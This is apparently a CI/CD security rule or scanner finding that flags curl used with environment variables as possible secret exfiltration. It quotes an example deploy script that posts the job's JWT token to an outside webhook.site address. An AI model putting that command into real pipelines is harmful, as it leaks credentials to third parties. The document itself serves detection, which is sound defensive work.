Using curl with environment variables could be an attempt to exfiltrate secrets from a pipeline. Investigate if the use of curl is appropriate and secure.
Block code and remove code that attempts to exfiltrate secrets.
deploy: - script: 'curl -H \"Content-Type: application/json\" -X POST --data "$CI_JOB_JWT_V1" https://webhook.site/4cf17d70-56ee-4b84-9823-e86461d2f826'
Updated 10 months ago